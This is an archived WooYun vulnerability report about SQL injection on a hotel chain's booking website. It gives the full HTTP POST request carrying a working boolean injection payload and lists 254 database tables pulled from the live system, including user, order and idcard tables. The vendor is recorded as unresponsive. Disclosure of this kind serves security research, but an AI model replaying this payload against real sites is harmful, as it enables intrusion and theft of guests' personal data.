当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0162001

漏洞标题:雅客e家快捷酒店sql注入(泄露大量数据啊!)

相关厂商:雅客e家快捷酒店

漏洞作者: 不败顽童

提交时间:2015-12-17 12:52

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-17: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

我想说这254张tables,还有我不能看到的东西么?
以后还能不能愉快的开房了?

详细说明:

POST /crs/internalMsgInfoList.html HTTP/1.1
Content-Length: 151
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.ykinns.com:80/
Cookie: JSESSIONID=0F35D01CD527AD63EF559BD18BEA2F68; JSESSIONID=8E9589F5903E9046C30649F7273752D5
Host: www.ykinns.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
acceptTime=4111111111111111&button=%e6%90%9c%e7%b4%a2&content=-1'%20OR%203*2*1%3d6%20AND%20000208%3d000208%20--%20&msgtype=0&page=1&sendTime=1&status=0

漏洞证明:

2015-12-16_19-08-36.jpg


2015-12-16_19-09-18.jpg


254张tables,呵呵。。
Database: chain702
[254 tables]
+-------------------------------+
| order |
| user |
| accountingtitle |
| acctrecoverpoint |
| adinfo |
| adtype |
| agreementcompany |
| agreementcompany_view |
| agreementtype |
| assuretype |
| attrs |
| attrvalues |
| audit |
| auth_i |
| autoupuserlevel |
| backroomrecover |
| bigmenu |
| bills |
| brands |
| businessstatistic4day |
| businessstatisticsdailyreport |
| centerpower |
| changecard |
| checkroom |
| city |
| cityview |
| clearhouserecord |
| clearhouseset |
| clearroomrecords |
| clientmac |
| comefrom |
| comments |
| companyvoucher |
| compensationrecord |
| complaintsearch_view |
| complaintstatus |
| conferenceorder |
| conferenceroom |
| consumergoods |
| consumptions |
| consumptiontype |
| controltype |
| crfolder |
| croomstats |
| crpara |
| crreport |
| crreport_shoucang |
| currencytype |
| custacct |
| custacct_11 |
| custacct_20141105_708616 |
| custacct_invoice |
| custacctcheckout |
| customdept |
| datadictionary |
| dayrentforfree |
| dayreport |
| dayreportitem |
| dayreportmonth |
| dayreportyear |
| dayturnover |
| department |
| dept |
| dgoods |
| dgoods_20150104 |
| downtown |
| dynamichouse |
| dynamichouseprice |
| emp |
| equipment |
| equrepair |
| exchange |
| exchange_view |
| floor |
| gatecard |
| gateway |
| generalstatistic |
| generalstatistic_invoice |
| giftPresent |
| goods |
| gorder |
| gorderdetail |
| grouppaytemplate |
| gtype |
| guest_view |
| horder |
| horder_11 |
| horder_view |
| hotel |
| hotelcalendar |
| hotelzone |
| hourhouse |
| house |
| house_view |
| houseprice |
| housestatus |
| housetype |
| housetypestatistic |
| idcard |
| iftype |
| incre_table |
| industry |
| internalcommunicationinfo |
| invgoods |
| invoiceappend |
| keeper_view |
| leaveinfo |
| livegroup |
| livingcusthis |
| livingcusthis_invoice |
| log |
| loginfo |
| mail |
| mainmenu |
| manager |
| manager_view |
| managerdiscount |
| market |
| mealticket |
| membercoupon |
| memberzone |
| memberzone_wx |
| menu |
| message |
| microblogbind |
| mob_access |
| mob_problem |
| mobilepower |
| monthstatistic |
| msgtype |
| nations |
| news |
| news_view |
| newsimplelog |
| newtype |
| notice_view |
| oauthinfo |
| oldreport |
| onlineservice |
| operatingincome |
| operatordictionary |
| operatoryjtj |
| order_11 |
| pagepower |
| paratype |
| partsettlerecover |
| payment |
| permission |
| permissionlog |
| personcome |
| planreason |
| portalpower |
| power |
| powermacbind |
| preauth |
| priceagreement |
| priceplan |
| project |
| project20130403 |
| projectprice |
| projecttype |
| projecttypes |
| publicaccount |
| ratecode |
| ratecodedetail |
| ratecodedetails |
| ratetype |
| reason |
| reason_view |
| reasondictionary |
| rechargevalue |
| rechargevaluediscount |
| rent |
| rentleave |
| rentleave_view |
| rentleavestatus |
| repairlevel |
| reportmapping |
| resetuserpwdback |
| room |
| roomall |
| roomcount |
| roomdaydata |
| roomrate |
| roomstatistics |
| roomstatus_view |
| roomtype |
| rpt_memberconsumer |
| saleperson |
| salseanalysis |
| score |
| scoreback |
| scoreruleexp |
| scoretohouse |
| sendsmsginfo |
| sequence |
| settleacct |
| settleacct_11 |
| settleconference |
| sgoods |
| shift |
| shifthandover |
| simplegroup |
| simplegroup_11 |
| simplegroup_view |
| smsgdetails |
| smsginfo |
| smsgmoinfo |
| smsgtype |
| smsgtypedetails |
| specialevent |
| specialhouseprice |
| statisticitem |
| statisticitem_invoice |
| stopandrepairreason |
| stoproomreport_view |
| store |
| supplier |
| supplier_wms |
| sys |
| sys_wx |
| sysctrl |
| systemlog |
| systemlog_view |
| task |
| telebill |
| tempinfo |
| thirdportal |
| ticketset |
| tickettransfer |
| tickettype |
| tmember |
| totalaccount |
| transfer |
| user_view |
| userback |
| userblackinfo |
| usercardprice |
| userhotelid |
| userlevel |
| userlevel_bck |
| userpreference |
| userrelorder |
| userrelorder_11 |
| userrelorder_user_view |
| userscore |
| userscorerule |
| userstatistic |
| vacctdetail |
| virtualacct |
| wakeuproom |
| workacct |
| workrecord |
| wrs_style |
+-------------------------------+

修复方案:

屏蔽特殊字符

版权声明:转载请注明来源 不败顽童@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝